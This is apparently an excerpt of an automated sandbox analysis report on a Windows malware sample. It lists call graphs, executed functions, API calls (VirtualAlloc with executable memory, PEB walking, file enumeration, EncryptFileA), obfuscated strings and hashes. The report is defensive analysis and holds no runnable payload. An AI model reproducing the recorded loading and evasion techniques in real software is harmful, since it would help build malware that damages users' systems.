36763->36765 36763->36772 36766 21f224d 36765->36766 36767 21f2239 SetLastError 36765->36767 36765->36772 36783 21f1a20 VirtualQuery VirtualFree VirtualAlloc 36766->36783 36767->36772 36769 21f2267 36770 21f2273 SetLastError 36769->36770 36774 21f229d 36769->36774 36770->36772 36772->36735 36775 21f1e80 36772->36775 36773 21f23ae SetLastError 36773->36772 36774->36772 36774->36773 36779 21f1eba 36775->36779 36776 21f1fe5 36777 21f1d10 2 API calls 36776->36777 36778 21f1fc1 36777->36778 36778->36743 36779->36776 36779->36778 36784 21f1d10 36779->36784 36781->36746 36782->36760 36783->36769 36785 21f1d29 36784->36785 36789 21f1d1f 36784->36789 36786 21f1d37 36785->36786 36788 21f1d9d VirtualProtect 36785->36788 36786->36789 36791 21f1820 VirtualFree 36786->36791 36788->36789 36789->36779 36791->36789 36792 42829c 36793 4282aa 36792->36793 36796 4281d2 36793->36796 36794 4282d7 36797 42828e RegCloseKey 36796->36797 36802 428206 36796->36802 36797->36794 36798 428207 RegOpenKeyExA 36799 428276 RegCloseKey 36798->36799 36798->36802 36799->36798 36800 42828d 36799->36800 36800->36797 36801 428224 RegQueryValueExA 36801->36802 36802->36798 36802->36799 36802->36801 36803 22696c9 36806 22696d0 36803->36806 36804 2269948 36809 2269967 36804->36809 36828 2263f20 GetPEB 36804->36828 36805 226993c 36806->36804 36806->36805 36813 2263f20 GetPEB 36806->36813 36815 2263e80 GetPEB 36806->36815 36816 22642f0 36806->36816 36827 2267ab0 GetPEB 36806->36827 36830 2263070 FindNextFileW FindFirstFileW FindClose GetPEB 36809->36830 36811 226995b 36829 2263e80 GetPEB 36811->36829 36813->36806 36815->36806 36817 22642fd 36816->36817 36820 2264313 36816->36820 36831 2263f20 GetPEB 36817->36831 36819 2264307 36832 2263e80 GetPEB 36819->36832 36822 2264340 RtlAllocateHeap 36820->36822 36833 2263f20 GetPEB 36820->36833 36822->36806 36824 226432f 36834 2263e80 GetPEB 36824->36834 36826 226433b 36826->36822 36827->36806 36828->36811 36829->36809 36830->36805 36831->36819 36832->36820 36833->36824 36834->36826

                                                                  Executed Functions

                                                                  Function 00402530 Relevance: 44.3, APIs: 9, Strings: 16, Instructions: 563libraryloaderfileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 0 402530-402575 LoadLibraryA GetProcAddress EncryptFileA 1 402f31-402f48 0->1 2 40257b-40268b call 401d60 * 3 call 402490 * 2 0->2 13 40269a-40276e call 401d60 * 3 call 402490 * 2 2->13 14 40268d-402697 call 41f153 2->14 27 402770-40277a call 41f153 13->27 28 40277d-402848 call 401d60 * 3 call 402490 * 2 13->28 14->13 27->28 41 402857-402913 call 401d60 * 2 call 402490 LoadLibraryA GetProcAddress 28->41 42 40284a-402854 call 41f153 28->42 51 402915 41->51 52 40291c-402948 GetProcAddress LdrFindResource_U 41->52 42->41 51->52 53 402967-4029bc VirtualAlloc call 401190 call 401e50 52->53 54 40294a-402961 LdrAccessResource 52->54 58 4029c1-4029ce call 42c68a 53->58 54->53 62 4029d4-4029ec call 4270cc 58->62 63 402c5f-402cbc call 404ad1 call 403b40 call 403100 call 4015d0 58->63 69 4029fe-402a1a 62->69 70 4029ee-4029fb call 41f153 62->70 96 402cce-402cea 63->96 97 402cbe-402ccb call 41f153 63->97 73 402a2c-402a48 69->73 74 402a1c-402a29 call 41f153 69->74 70->69 78 402a5a-402a76 73->78 79 402a4a-402a57 call 41f153 73->79 74->73 81 402a88-402aa4 78->81 82 402a78-402a85 call 41f153 78->82 79->78 87 402ab3-402acc 81->87 88 402aa6-402ab0 call 41f153 81->88 82->81 93 402ade-402af7 87->93 94 402ace-402adb call 41f153 87->94 88->87 99 402b06-402b19 93->99 100 402af9-402b03 call 41f153 93->100 94->93 105 402cfc-402d18 96->105 106 402cec-402cf9 call 41f153 96->106 97->96 102 402b2b-402b47 99->102 103 402b1b-402b28 call 41f153 99->103 100->99 112 402b59-402b75 102->112 113 402b49-402b56 call 41f153 102->113 103->102 109 402d2a-402d46 105->109 110 402d1a-402d27 call 41f153 105->110 106->105 117 402d58-402d74 109->117 118 402d48-402d55 call 41f153 109->118 110->109 121 402b87-402ba0 112->121 122 402b77-402b84 call 41f153 112->122 113->112 126 402d83-402d9c 117->126 127 402d76-402d80 call 41f153 117->127 118->117 130 402ba2-402bac call 41f153 121->130 131 402baf-402bc2 121->131 122->121 137 402dae-402dc7 126->137 138 402d9e-402dab call 41f153 126->138 127->126 130->131 133 402bd4-402bf0 131->133 134 402bc4-402bd1 call 41f153 131->134 144 402c02-402c1e 133->144 145 402bf2-402bff call 41f153 133->145 134->133 141 402dd6-402de9 137->141 142 402dc9-402dd3 call 41f153 137->142 138->137 149 402dfb-402e17 141->149 150 402deb-402df8 call 41f153 141->150 142->141 153 402c30-402c4c 144->153 154 402c20-402c2d call 41f153 144->154 145->144 158 402e29-402e45 149->158 159 402e19-402e26 call 41f153 149->159 150->149 162 402c52-402c5a 153->162 163 402f2e-402f30 153->163 154->153 167 402e57-402e70 158->167 168 402e47-402e54 call 41f153 158->168 159->158 164 402f26-402f2b call 41f153 162->164 163->1 164->163 170 402e72-402e7c call 41f153 167->170 171 402e7f-402e92 167->171 168->167 170->171 177 402ea4-402ec0 171->177 178 402e94-402ea1 call 41f153 171->178 182 402ed2-402eee 177->182 183 402ec2-402ecf call 41f153 177->183 178->177 186 402f00-402f1c 182->186 187 402ef0-402efd call 41f153 182->187 183->182 186->163 188 402f1e-402f25 186->188 187->186 188->164
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(Advapi32.dll,EncryptFileA), ref: 00402563
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00402566
                                                                  • EncryptFileA.ADVAPI32(C:\Windows\Setup\State\State.ini), ref: 00402571
                                                                  • LoadLibraryA.KERNEL32 ref: 004028F0
                                                                  • GetProcAddress.KERNEL32(00000000,LdrFindResource_U), ref: 004028FA
                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0040291E
                                                                  • LdrFindResource_U.NTDLL(00400000,?,00000003,?), ref: 00402940
                                                                  • LdrAccessResource.NTDLL(00400000,?,?,?), ref: 00402961
                                                                  • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00402974
                                                                    • Part of subcall function 00403B40: LoadIconA.USER32(?,00000080), ref: 00403C94
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: AddressLoadProc$Library$AccessAllocEncryptFileFindIconResourceResource_Virtual
                                                                  • String ID: 2sqN7HPu$ul(RB@jWoBnNar^zWR24F02n#bnM3gX6zQ>^jmGICwkhJ?*#2^h2EEKd&#?A8<JT0c%Q?f1Y6Da*fKp6B+(L3!F<O*&V$Acces$Advapi32.dll$C:\Windows\Setup\State\State.ini$EncryptFileA$Ldr$LdrAccessR$LdrFin$LdrFindResource_U$dReso$esource$ntdll.dll$r_n$sResource$tdll$urce_U
                                                                  • API String ID: 2745701538-3822946923
                                                                  • Opcode ID: ff7380a43e44da0602bb0ab87dd5fe5d31548b4def8bd87a78dd0ffcd0c5d888
                                                                  • Instruction ID: 7606226607a74ee82f4d59785f456a1b28ac7059c3ee9b1f73d73fed3cc09996
                                                                  • Opcode Fuzzy Hash: ff7380a43e44da0602bb0ab87dd5fe5d31548b4def8bd87a78dd0ffcd0c5d888
                                                                  • Instruction Fuzzy Hash: 074208B19083C0DBD331DF1AC585BCBFBE4AB99704F44492FA1C953291DAB8A548CB5B
                                                                  Function 021F1030 Relevance: 18.4, APIs: 12, Instructions: 362libraryloaderCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 192 21f1030-21f1075 LoadLibraryW GetProcAddress call 21f1b30 195 21f107e-21f108f 192->195 196 21f1077-21f1079 192->196 197 21f10a3-21f10be call 21f1b30 195->197 198 21f1091-21f109e SetLastError 195->198 199 21f148d-21f1490 196->199 202 21f10c7-21f10dc 197->202 203 21f10c0-21f10c2 197->203 198->199 204 21f10de-21f10eb SetLastError 202->204 205 21f10f0-21f10fd 202->205 203->199 204->199 206 21f10ff-21f110c SetLastError 205->206 207 21f1111-21f111a 205->207 206->199 208 21f112e-21f114f 207->208 209 21f111c-21f1129 SetLastError 207->209 210 21f1163-21f116d 208->210 209->199 211 21f116f-21f1176 210->211 212 21f11a5-21f11d5 GetNativeSystemInfo call 21f18d0 * 2 210->212 214 21f1178-21f1184 211->214 215 21f1186-21f1192 211->215 223 21f11e9-21f120c call 21f1800 212->223 224 21f11d7-21f11e4 SetLastError 212->224 216 21f1195-21f119b 214->216 215->216 218 21f119d-21f11a0 216->218 219 21f11a3 216->219 218->219 219->210 226 21f120e-21f121f call 21f1800 223->226 227 21f123d-21f1255 GetProcessHeap RtlAllocateHeap 223->227 224->199 232 21f1222-21f122c 226->232 228 21f127b-21f1291 227->228 229 21f1257-21f1276 SetLastError 227->229 230 21f129c 228->230 231 21f1293-21f129a 228->231 229->199 235 21f12a3-21f1300 call 21f1b30 230->235 231->235 232->227 233 21f122e-21f1238 SetLastError 232->233 233->199 238 21f1307-21f1370 call 21f1800 call 21f1980 call 21f1b50 235->238 239 21f1302 235->239 248 21f1377-21f1388 238->248 249 21f1372 238->249 240 21f147f-21f148b call 21f16c0 239->240 240->199 250 21f138a-21f13a0 call 21f2090 248->250 251 21f13a2-21f13a5 248->251 249->240 253 21f13ac-21f13ba call 21f21a0 250->253 251->253 257 21f13bc 253->257 258 21f13c1-21f13c5 call 21f1e80 253->258 257->240 260 21f13ca-21f13cf 258->260 261 21f13d6-21f13e4 call 21f2010 260->261 262 21f13d1 260->262 265 21f13eb-21f13f4 261->265 266 21f13e6 261->266 262->240 267 21f13f6-21f13fd 265->267 268 21f1470-21f1473 265->268 266->240 269 21f13ff-21f145b GetPEB 267->269 270 21f145d-21f146b 267->270 271 21f147a-21f147d 268->271 272 21f146e 269->272 270->272 271->199 272->271
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(021F4054,021F4040), ref: 021F1047
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 021F104E
                                                                    • Part of subcall function 021F1B30: SetLastError.KERNEL32(0000000D,?,021F1070,?,00000040), ref: 021F1B3D
                                                                  • SetLastError.KERNEL32(000000C1), ref: 021F1096
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113850461.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_21f1000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$AddressLibraryLoadProc
                                                                  • String ID:
                                                                  • API String ID: 1866314245-0
                                                                  • Opcode ID: b073770b48b588f256191236cab786e860ce3197099eb4eb5eacb28a3681fc75
                                                                  • Instruction ID: 7d007817ae0e5d6418b3f6f64f7da51958a514b127af4bb7dacac3c8bc73f0fa
                                                                  • Opcode Fuzzy Hash: b073770b48b588f256191236cab786e860ce3197099eb4eb5eacb28a3681fc75
                                                                  • Instruction Fuzzy Hash: 33F1EDB4E40209EFDB44DF94D984BAEB7B1BF88314F108599EA29AB341D735EA41CF50
                                                                  Function 022638F0 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 189fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 368 22638f0-226390b 369 2263910-2263915 368->369 370 2263a74-2263a79 369->370 371 226391b 369->371 372 2263b62-2263b67 370->372 373 2263a7f-2263a84 370->373 374 2263921-2263926 371->374 375 2263a2c-2263a33 371->375 372->369 378 226393a-226393f 373->378 379 2263a8a-2263a8f 373->379 380 2263988-226399b call 22634c0 374->380 381 2263928-226392d 374->381 376 2263a35-2263a4b call 2263f20 call 2263e80 375->376 377 2263a50-2263a64 FindFirstFileW 375->377 376->377 384 2263b93-2263b9d 377->384 385 2263a6a-2263a6f 377->385 378->369 390 2263941-226394b 378->390 386 2263a95-2263a9b 379->386 387 2263b3c-2263b5d 379->387 405 226399d-22639b3 call 2263f20 call 2263e80 380->405 406 22639b8-22639d3 380->406 388 226392f-2263934 381->388 389 226394c-2263953 381->389 385->369 393 2263abf-2263ac1 386->393 394 2263a9d-2263aa5 386->394 387->369 388->378 395 2263b6c-2263b73 388->395 396 2263955-226396b call 2263f20 call 2263e80 389->396 397 2263970-2263986 FindNextFileW 389->397 399 2263ab5-2263aba 393->399 400 2263ac3-2263ad6 call 22634c0 393->400 394->399 407 2263aa7-2263aab 394->407 403 2263b75-2263b8b call 2263f20 call 2263e80 395->403 404 2263b90-2263b91 FindClose 395->404 396->397 397->369 399->369 422 2263af3-2263b23 call 22638f0 400->422 423 2263ad8-2263aee call 2263f20 call 2263e80 400->423 403->404 404->384 405->406 419 22639d5-22639eb call 2263f20 call 2263e80 406->419 420 22639f0-22639fb 406->420 407->393 413 2263aad-2263ab3 407->413 413->393 413->399 419->420 436 22639fd-2263a13 call 2263f20 call 2263e80 420->436 437 2263a18-2263a27 420->437 442 2263b28-2263b37 call 2263460 422->442 423->422 436->437 437->369 442->369
                                                                  APIs
                                                                  • FindNextFileW.KERNELBASE(?,?,00000000,0226998D,16BF64F2,00000001), ref: 02263976
                                                                  • FindFirstFileW.KERNELBASE(?,?,00000000,0226998D,16BF64F2,00000001), ref: 02263A5D
                                                                  • FindClose.KERNELBASE(?,00000000,0226998D,16BF64F2,00000001), ref: 02263B91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: true
                                                                  • Associated: 00000000.00000002.2113944941.0000000002260000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113968818.000000000226D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002270000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002275000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002282000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2260000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Find$File$CloseFirstNext
                                                                  • String ID: .$8T]$8T]$Ei$Ei
                                                                  • API String ID: 3541575487-3972632629
                                                                  • Opcode ID: 4a571c7725c3f5fff95127ab016b045ba9eb2a4e4743d5b2d63cf478e35efda9
                                                                  • Instruction ID: 013facd2e002c205cde5e1f3673b29a03b146e4de98c2bff109adeeadb5f294c
                                                                  • Opcode Fuzzy Hash: 4a571c7725c3f5fff95127ab016b045ba9eb2a4e4743d5b2d63cf478e35efda9
                                                                  • Instruction Fuzzy Hash: 53510C77B253025BC734EAF4A85C77B32D6ABC0B04F00489DE946C7248EE76CC948B92
                                                                  Function 02268240 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 183fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 604 2268240-226832a 605 2268332-2268338 604->605 606 2268431-2268437 605->606 607 226833e 605->607 610 22684c3-22684c8 606->610 611 226843d-2268443 606->611 608 2268344-226834a 607->608 609 22683fc-2268403 607->609 612 22683c0-22683c7 608->612 613 226834c-2268352 608->613 614 2268405-226841b call 2263f20 call 2263e80 609->614 615 2268420-226842c 609->615 610->605 616 2268445-226844c 611->616 617 22684ac-22684b2 611->617 624 22683e4-22683f7 612->624 625 22683c9-22683df call 2263f20 call 2263e80 612->625 621 22684cd-2268515 call 226b590 613->621 622 2268358-226835e 613->622 614->615 615->605 618 226844e-2268464 call 2263f20 call 2263e80 616->618 619 2268469-226848c 616->619 617->605 620 22684b8-22684c2 617->620 618->619 643 226848e-22684a4 call 2263f20 call 2263e80 619->643 644 22684a9 619->644 621->620 641 2268517 621->641 622->617 628 2268364-226836c 622->628 624->605 625->624 635 226836e-2268386 call 2263f20 call 2263e80 628->635 636 226838c-22683b0 CreateFileW 628->636 635->636 636->620 646 22683b6-22683bb 636->646 650 226851d-226852a 641->650 651 2268519-226851b 641->651 643->644 644->617 646->605 651->620 651->650
                                                                  APIs
                                                                  • CreateFileW.KERNELBASE(?,?,?,00000000,?,0235BF01,00000000,?,?,00000000,2564BE4F), ref: 022683A9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: true
                                                                  • Associated: 00000000.00000002.2113944941.0000000002260000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113968818.000000000226D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002270000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002275000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002282000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2260000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID: J$.#v
                                                                  • API String ID: 823142352-3621003161
                                                                  • Opcode ID: 30c97c60238384f0a97d117f7023aaae91cc524d4b2775ab3e5b6787b8c30196
                                                                  • Instruction ID: bdc381ba2c7dfffdec7ac2fe0f2b5c4093456845ed473f00d1d3de6bfccb8cae
                                                                  • Opcode Fuzzy Hash: 30c97c60238384f0a97d117f7023aaae91cc524d4b2775ab3e5b6787b8c30196
                                                                  • Instruction Fuzzy Hash: 4B61BC73A153029FC708DFA8D488A2FB7E2ABC4744F04891DF4959B288D774C9498BD3
                                                                  Function 022642F0 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00000000,00000008,00000480), ref: 02264344
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: true
                                                                  • Associated: 00000000.00000002.2113944941.0000000002260000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113968818.000000000226D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002270000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002275000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2113980276.0000000002282000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_2260000_ExeFile (233).jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: da66a822a7c663d8af3f7f8d7b911279ce126e00212874470fe5f3f700cba7d9
                                                                  • Instruction ID: 2ab0c478892dbf692397a817110d44e129a61ac8d720992b3189d069aa8452e4
                                                                  • Opcode Fuzzy Hash: da66a822a7c663d8af3f7f8d7b911279ce126e00212874470fe5f3f700cba7d9
                                                                  • Instruction Fuzzy Hash: B5E06573B512066F9B14F6F574AC67B25ABABD1A807188869F441CB348EEB08C514BE0
                                                                  Function 00403250 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindResourceA.KERNEL32(?,?,00000006), ref: 00403267
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: FindResource
                                                                  • String ID:
                                                                  • API String ID: 1635176832-0
                                                                  • Opcode ID: 3fb110486180756d7062ab4bb5e945649043ed0de42859ea3d5401de1059676a
                                                                  • Instruction ID: 81cb0e02c961f06c601f38abdce0fa68ed7433aa8319f068ff8f8c5a31199cb9
                                                                  • Opcode Fuzzy Hash: 3fb110486180756d7062ab4bb5e945649043ed0de42859ea3d5401de1059676a
                                                                  • Instruction Fuzzy Hash: 57D0C2263000202AE5101A0A7C01DBB679CDBC5636B01407FF881EA150D2349C03A1B1
                                                                  Function 00401E50 Relevance: .5, Instructions: 504COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 79bb1fcc020155563c7cc4a2954cba24265ea2a619610a4c7e0d977e309fa0fa
                                                                  • Instruction ID: 89b8f714c6d77962538825249d7482e3452185ede8dc8e96fc1d04669f1ea640
                                                                  • Opcode Fuzzy Hash: 79bb1fcc020155563c7cc4a2954cba24265ea2a619610a4c7e0d977e309fa0fa
                                                                  • Instruction Fuzzy Hash: 670207757002018BD710DB28C451F2677A2AF99718F3886ADE549AF3D6D77AEC42C7C8
                                                                  Function 004297AA Relevance: 15.1, APIs: 10, Instructions: 99memoryCOMMONLIBRARYCODE
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 277 4297aa-4297c9 EnterCriticalSection 278 4297cb-4297d2 277->278 279 4297d8-4297dd 277->279 278->279 280 42988c-42988f 278->280 281 4297fa-429802 279->281 282 4297df-4297e2 279->282 283 429891-429894 280->283 284 429897-4298b5 LeaveCriticalSection 280->284 286 429814-429833 GlobalHandle GlobalUnlock GlobalReAlloc 281->286 287 429804-429812 GlobalAlloc 281->287 285 4297e5-4297e8 282->285 283->284 288 4297f2-4297f4 285->288 289 4297ea-4297f0 285->289 290 429839-42983b 286->290 287->290 288->280 288->281 289->285 289->288 291 429860-429889 GlobalLock call 40ee80 290->291 292 42983d-429842 290->292 291->280 294 429852-429855 LeaveCriticalSection 292->294 295 429844-42984c GlobalHandle GlobalLock 292->295 294->291 295->294
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(0043F1BC,76230A60,?,?,0043F1A0,0043F1A0,?,00429CE6,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399,00425BC8), ref: 004297BB
                                                                  • GlobalAlloc.KERNELBASE(00000002,00000040,?,?,0043F1A0,0043F1A0,?,00429CE6,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399,00425BC8), ref: 0042980C
                                                                  • GlobalHandle.KERNEL32(00662F78), ref: 00429815
                                                                  • GlobalUnlock.KERNEL32(00000000,?,?,0043F1A0,0043F1A0,?,00429CE6,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399,00425BC8,76230A60), ref: 0042981F
                                                                  • GlobalReAlloc.KERNEL32(?,00000040,00002002), ref: 00429833
                                                                  • GlobalHandle.KERNEL32(00662F78), ref: 00429845
                                                                  • GlobalLock.KERNEL32(00000000,?,?,0043F1A0,0043F1A0,?,00429CE6,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399,00425BC8,76230A60), ref: 0042984C
                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,0043F1A0,0043F1A0,?,00429CE6,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399,00425BC8,76230A60), ref: 00429855
                                                                  • GlobalLock.KERNEL32(00000000,?,?,0043F1A0,0043F1A0,?,00429CE6,76230A60,00000000,?,004295E3,00428940,004295FF,0041F399,00425BC8,76230A60), ref: 00429861
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 004298A9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                                                                  • String ID:
                                                                  • API String ID: 2667261700-0
                                                                  • Opcode ID: 4f9e3a5ef5ad01d73bbac885e9157687d52a2eef6912d29c00d5968687f22220
                                                                  • Instruction ID: c16d36367e021ba24902c865a556433996ae8c1a0eb80cc3bd54c7b43d994e5f
                                                                  • Opcode Fuzzy Hash: 4f9e3a5ef5ad01d73bbac885e9157687d52a2eef6912d29c00d5968687f22220
                                                                  • Instruction Fuzzy Hash: 43319A30700714AFDB20DF66D888A6ABBF9FB84344B44497EE546D3620D734ED06CB68
                                                                  Function 02267EC0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 227fileCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 297 2267ec0-2267f8c 298 2267f94-2267f99 297->298 299 2267fa0-2267fa6 298->299 300 2267fac 299->300 301 22680cb-22680d1 299->301 302 2267fae-2267fb4 300->302 303 226801a-226802e call 22634c0 300->303 304 22680d7-22680dd 301->304 305 22681a8-22681b0 301->305 306 2267fb6-2267fbc 302->306 307 2267fd5-2268018 call 226b590 302->307 331 2268030-2268048 call 2263f20 call 2263e80 303->331 332 226804e-2268076 303->332 308 2268173-226817a 304->308 309 22680e3-22680e9 304->309 311 22681b2-22681ca call 2263f20 call 2263e80 305->311 312 22681d0-22681f4 CreateFileW 305->312 315 2267fc2-2267fc8 306->315 316 2268200-2268207 306->316 307->299 313 2268197-22681a3 308->313 314 226817c-2268192 call 2263f20 call 2263e80 308->314 318 226815a-2268160 309->318 319 22680eb-2268122 309->319 311->312 322 22681f6-22681fb 312->322 323 2268227-2268233 312->323 313->299 314->313 315->318 327 2267fce-2267fd3 315->327 325 2268224 316->325 326 2268209-226821f call 2263f20 call 2263e80 316->326 318->299 334 2268166-2268172 318->334 329 2268124-226813a call 2263f20 call 2263e80 319->329 330 226813f-2268155 SetFileInformationByHandle 319->330 322->299 325->323 326->325 327->299 329->330 330->299 331->332 347 2268093-226809e 332->347 348 2268078-226808e call 2263f20 call 2263e80 332->348 360 22680a0-22680b6 call 2263f20 call 2263e80 347->360 361 22680bb-22680c6 347->361 348->347 360->361 361->298
                                                                  APIs
                                                                  • SetFileInformationByHandle.KERNELBASE(007EF903,00000000,?,00000028), ref: 02268149
                                                                  • CreateFileW.KERNELBASE(?,?,?,00000000,?,0235BF01,00000000), ref: 022681ED
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113956187.0000000002261000.00000020.00001000.00020000.00000000.sdmp, Offset: 02260000, based on PE: true
